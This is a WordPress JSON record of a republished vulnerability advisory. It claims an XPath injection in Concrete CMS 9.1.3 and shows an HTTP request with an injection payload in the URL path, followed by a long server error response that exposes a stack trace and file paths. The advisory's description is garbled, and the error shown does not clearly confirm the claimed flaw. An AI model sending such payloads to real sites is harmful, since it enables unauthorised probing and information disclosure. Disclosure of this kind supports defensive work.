{"id":34187,"date":"2022-11-29T19:19:41","date_gmt":"2022-11-29T16:19:41","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170041\/concretecms913-xpath.txt"},"modified":"2022-11-30T08:40:39","modified_gmt":"2022-11-30T05:10:39","slug":"concrete-cms-9-1-3-xpath-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/concrete-cms-9-1-3-xpath-injection\/","title":{"rendered":"Concrete CMS 9.1.3 XPATH Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: concretecms-9.1.3 Xpath injection<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 11.28.2022<br \/>\n## Vendor: https:\/\/www.concretecms.org\/<br \/>\n## Software: https:\/\/www.concretecms.org\/download<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/concretecms.org\/2022\/concretecms-9.1.3<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe URL path folder `3` appears to be vulnerable to XPath injection attacks.<br \/>\nThe test payload 50539478&#8242; or 4591=4591&#8211; was submitted in the URL<br \/>\npath folder `3`, and an XPath error message was returned.<br \/>\nThe attacker can flood with requests the system by using this<br \/>\nvulnerability to untilted he receives the actual paths of the all<br \/>\ncontent of this system which content is stored on some internal or<br \/>\nexternal server.<\/p>\n<p dir=\"ltr\">## STATUS: HIGH Vulnerability<\/p>\n<p dir=\"ltr\">[+] Exploits:<br \/>\n00:<br \/>\n&#8220;`GET<br \/>\nGET \/concrete-cms-9.1.3\/index.php\/ccm50539478&#8217;%20or%204591%3d4591&#8211;%20\/assets\/localization\/moment\/js<br \/>\nHTTP\/1.1<br \/>\nHost: pwnedhost.com<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9<br \/>\nAccept-Language: en-US;q=0.9,en;q=0.8<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64)<br \/>\nAppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.5304.107<br \/>\nSafari\/537.36<br \/>\nConnection: close<br \/>\nCache-Control: max-age=0<br \/>\nUpgrade-Insecure-Requests: 1<br \/>\nSec-CH-UA: &#8220;.Not\/A)Brand&#8221;;v=&#8221;99&#8243;, &#8220;Google Chrome&#8221;;v=&#8221;107&#8243;, &#8220;Chromium&#8221;;v=&#8221;107&#8243;<br \/>\nSec-CH-UA-Platform: Windows<br \/>\nSec-CH-UA-Mobile: ?0<br \/>\nContent-Length: 0<br \/>\n&#8220;`<\/p>\n<p dir=\"ltr\">[+] Response:<\/p>\n<p dir=\"ltr\">&#8220;`HTTP<br \/>\nHTTP\/1.1 500 Internal Server Error<br \/>\nDate: Mon, 28 Nov 2022 15:32:22 GMT<br \/>\nServer: Apache\/2.4.54 (Win64) OpenSSL\/1.1.1p PHP\/7.4.30<br \/>\nX-Powered-By: PHP\/7.4.30<br \/>\nConnection: close<br \/>\nContent-Type: text\/html;charset=UTF-8<br \/>\nContent-Length: 592153<\/p>\n<p dir=\"ltr\">&lt;!DOCTYPE html&gt;&lt;!&#8211;<\/p>\n<p dir=\"ltr\">Whoops\\Exception\\ErrorException: include(): Failed opening<br \/>\n&#8216;C:\/xampp\/htdocs\/pwnedhost\/concrete-cms-9.1.3\/application\/files\/cache\/expensive\\0fea6a13c52b4d47\\25368f24b045ca84\\38a865804f8fdcb6\\57cd99682e939275\\3e7d68124ace5663\\5a578007c2573b03\\d35376a9b3047dec\\fee81596e3895419.php&#8217;<br \/>\nfor inclusion (include_path=&#8217;C:\/xampp\/htdocs\/pwnedhost\/concrete-cms-9.1.3\/concrete\/vendor;C:\\xampp\\php\\PEAR&#8217;)<br \/>\nin file C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem\\NativeEncoder.php<br \/>\non line 26<br \/>\nStack trace:<br \/>\n1. Whoops\\Exception\\ErrorException-&gt;()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem\\NativeEncoder.php:26<br \/>\n2. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem\\NativeEncoder.php:26<br \/>\n3. Stash\\Driver\\FileSystem\\NativeEncoder-&gt;deserialize()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Driver\\FileSystem.php:201<br \/>\n4. Stash\\Driver\\FileSystem-&gt;getData()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:631<br \/>\n5. Stash\\Item-&gt;getRecord()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:321<br \/>\n6. Stash\\Item-&gt;executeGet()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:252<br \/>\n7. Stash\\Item-&gt;get()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\tedivm\\stash\\src\\Stash\\Item.php:346<br \/>\n8. Stash\\Item-&gt;isMiss()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Cache\\Adapter\\LaminasCacheDriver.php:67<br \/>\n9. Concrete\\Core\\Cache\\Adapter\\LaminasCacheDriver-&gt;internalGetItem()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-cache\\src\\Storage\\Adapter\\AbstractAdapter.php:356<br \/>\n10. Laminas\\Cache\\Storage\\Adapter\\AbstractAdapter-&gt;getItem()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-i18n\\src\\Translator\\Translator.php:601<br \/>\n11. Laminas\\I18n\\Translator\\Translator-&gt;loadMessages()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-i18n\\src\\Translator\\Translator.php:434<br \/>\n12. Laminas\\I18n\\Translator\\Translator-&gt;getTranslatedMessage()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\vendor\\laminas\\laminas-i18n\\src\\Translator\\Translator.php:349<br \/>\n13. Laminas\\I18n\\Translator\\Translator-&gt;translate()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Localization\\Translator\\Adapter\\Laminas\\TranslatorAdapter.php:69<br \/>\n14. Concrete\\Core\\Localization\\Translator\\Adapter\\Laminas\\TranslatorAdapter-&gt;translate()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\bootstrap\\helpers.php:27<br \/>\n15. t() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\blocks\\top_navigation_bar\\view.php:47<br \/>\n16. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Block\\View\\BlockView.php:267<br \/>\n17. Concrete\\Core\\Block\\View\\BlockView-&gt;renderViewContents()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\AbstractView.php:164<br \/>\n18. Concrete\\Core\\View\\AbstractView-&gt;render()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Area\\Area.php:853<br \/>\n19. Concrete\\Core\\Area\\Area-&gt;display()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Area\\GlobalArea.php:128<br \/>\n20. Concrete\\Core\\Area\\GlobalArea-&gt;display()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\themes\\atomik\\elements\\header.php:11<br \/>\n21. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\View.php:125<br \/>\n22. Concrete\\Core\\View\\View-&gt;inc()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\themes\\atomik\\view.php:4<br \/>\n23. include() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\View.php:329<br \/>\n24. Concrete\\Core\\View\\View-&gt;renderTemplate()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\View.php:291<br \/>\n25. Concrete\\Core\\View\\View-&gt;renderViewContents()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\View\\AbstractView.php:164<br \/>\n26. Concrete\\Core\\View\\AbstractView-&gt;render()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\controllers\\single_page\\page_not_found.php:19<br \/>\n27. Concrete\\Controller\\SinglePage\\PageNotFound-&gt;view()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Controller\\AbstractController.php:318<br \/>\n28. call_user_func_array()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Controller\\AbstractController.php:318<br \/>\n29. Concrete\\Core\\Controller\\AbstractController-&gt;runAction()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:188<br \/>\n30. Concrete\\Core\\Http\\ResponseFactory-&gt;controller()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:95<br \/>\n31. Concrete\\Core\\Http\\ResponseFactory-&gt;notFound()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:390<br \/>\n32. Concrete\\Core\\Http\\ResponseFactory-&gt;collectionNotFound()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\ResponseFactory.php:234<br \/>\n33. Concrete\\Core\\Http\\ResponseFactory-&gt;collection()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\DefaultDispatcher.php:132<br \/>\n34. Concrete\\Core\\Http\\DefaultDispatcher-&gt;handleDispatch()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\DefaultDispatcher.php:60<br \/>\n35. Concrete\\Core\\Http\\DefaultDispatcher-&gt;dispatch()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\DispatcherDelegate.php:39<br \/>\n36. Concrete\\Core\\Http\\Middleware\\DispatcherDelegate-&gt;next()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\FrameOptionsMiddleware.php:39<br \/>\n37. Concrete\\Core\\Http\\Middleware\\FrameOptionsMiddleware-&gt;process()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50<br \/>\n38. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate-&gt;next()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\StrictTransportSecurityMiddleware.php:36<br \/>\n39. Concrete\\Core\\Http\\Middleware\\StrictTransportSecurityMiddleware-&gt;process()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50<br \/>\n40. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate-&gt;next()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\ContentSecurityPolicyMiddleware.php:36<br \/>\n41. Concrete\\Core\\Http\\Middleware\\ContentSecurityPolicyMiddleware-&gt;process()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50<br \/>\n42. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate-&gt;next()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\CookieMiddleware.php:35<br \/>\n43. Concrete\\Core\\Http\\Middleware\\CookieMiddleware-&gt;process()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50<br \/>\n44. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate-&gt;next()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\ApplicationMiddleware.php:29<br \/>\n45. Concrete\\Core\\Http\\Middleware\\ApplicationMiddleware-&gt;process()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareDelegate.php:50<br \/>\n46. Concrete\\Core\\Http\\Middleware\\MiddlewareDelegate-&gt;next()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\Middleware\\MiddlewareStack.php:86<br \/>\n47. Concrete\\Core\\Http\\Middleware\\MiddlewareStack-&gt;process()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Http\\DefaultServer.php:85<br \/>\n48. Concrete\\Core\\Http\\DefaultServer-&gt;handleRequest()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Foundation\\Runtime\\Run\\DefaultRunner.php:125<br \/>\n49. Concrete\\Core\\Foundation\\Runtime\\Run\\DefaultRunner-&gt;run()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\src\\Foundation\\Runtime\\DefaultRuntime.php:102<br \/>\n50. Concrete\\Core\\Foundation\\Runtime\\DefaultRuntime-&gt;run()<br \/>\nC:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\concrete\\dispatcher.php:45<br \/>\n51. require() C:\\xampp\\htdocs\\pwnedhost\\concrete-cms-9.1.3\\index.php:2<\/p>\n<p dir=\"ltr\">&#8211;&gt;&lt;html&gt;<br \/>\n&lt;head&gt;<br \/>\n&lt;meta charset=&#8221;utf-8&#8243;&gt;<br \/>\n&lt;meta name=&#8221;robots&#8221; content=&#8221;noindex,nofollow&#8221;\/&gt;<br \/>\n&lt;meta name=&#8221;viewport&#8221; content=&#8221;width=device-width,<br \/>\ninitial-scale=1, shrink-to-fit=no&#8221;\/&gt;<br \/>\n&lt;title&gt;Concrete CMS has encountered an issue.&lt;\/title&gt;<\/p>\n<p dir=\"ltr\">&lt;style&gt;body {<br \/>\nfont: 12px &#8220;Helvetica Neue&#8221;, helvetica, arial, sans-serif;<br \/>\ncolor: #131313;<br \/>\nbackground: #eeeeee;<br \/>\npadding:0;<br \/>\nmargin: 0;<br \/>\nmax-height: 100%;<\/p>\n<p dir=\"ltr\">text-rendering: optimizeLegibility;<br \/>\n}<br \/>\na {<br \/>\ntext-decoration: none;<br \/>\n}<\/p>\n<p dir=\"ltr\">.Whoops.container {<br \/>\nposition: relative;<br \/>\nz-index: 9999999999;<br \/>\n}<\/p>\n<p dir=\"ltr\">.panel {<br \/>\noverflow-y: scroll;<br \/>\nheight: 100%;<br \/>\nposition: fixed;<br \/>\nmargin: 0;<br \/>\nleft: 0;<br \/>\ntop: 0;<br \/>\n}<\/p>\n<p dir=\"ltr\">.branding {<br \/>\nposition: absolute;<br \/>\ntop: 10px;<br \/>\nright: 20px;<br \/>\ncolor: #777777;<br \/>\nfont-size: 10px;<br \/>\nz-index: 100;<br \/>\n}<br \/>\n.branding a {<br \/>\ncolor: #e95353;<br \/>\n}<\/p>\n<p dir=\"ltr\">header {<br \/>\ncolor: white;<br \/>\nbox-sizing: border-box;<br \/>\nbackground-color: #2a2a2a;<br \/>\npadding: 35px 40px;<br \/>\nmax-height: 180px;<br \/>\noverflow: hidden;<br \/>\ntransition: 0.5s;<br \/>\n}<\/p>\n<p dir=\"ltr\">header.header-expand {<br \/>\nmax-height: 1000px;<br \/>\n}<\/p>\n<p dir=\"ltr\">.exc-title {<br \/>\nmargin: 0;<br \/>\ncolor: #bebebe;<br \/>\nfont-size: 14px;<br \/>\n}<br \/>\n.exc-title-primary, .exc-title-secondary {<br \/>\ncolor: #e95353;<br \/>\n}<\/p>\n<p dir=\"ltr\">.exc-message {<br \/>\nfont-size: 20px;<br \/>\nword-wrap: break-word;<br \/>\nmargin: 4px 0 0 0;<br \/>\ncolor: white;<br \/>\n}<br \/>\n.exc-message span {<br \/>\ndisplay: block;<br \/>\n}<br \/>\n.exc-message-empty-notice {<br \/>\ncolor: #a29d9d;<br \/>\nfont-weight: 300;<br \/>\n}<\/p>\n<p dir=\"ltr\">&#8230;&#8230;.<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/concretecms.org\/2022\/concretecms-9.1.3)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/4f60ka)<\/p>\n<p dir=\"ltr\">## Time spent<br \/>\n`03:00:00`<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: concretecms-9.1.3 Xpath injection ## Author: nu11secur1ty ## Date: 11.28.2022 ## Vendor: https:\/\/www.concretecms.org\/ ## Software: https:\/\/www.concretecms.org\/download ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/concretecms.org\/2022\/concretecms-9.1.3 ## Description: The URL path folder `3` appears to be vulnerable to XPath injection attacks. The test payload 50539478&#8242; or 4591=4591&#8211; was submitted in the URL path folder `3`, and an XPath error message was &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34187","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34187"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34187\/revisions"}],"predecessor-version":[{"id":34199,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34187\/revisions\/34199"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}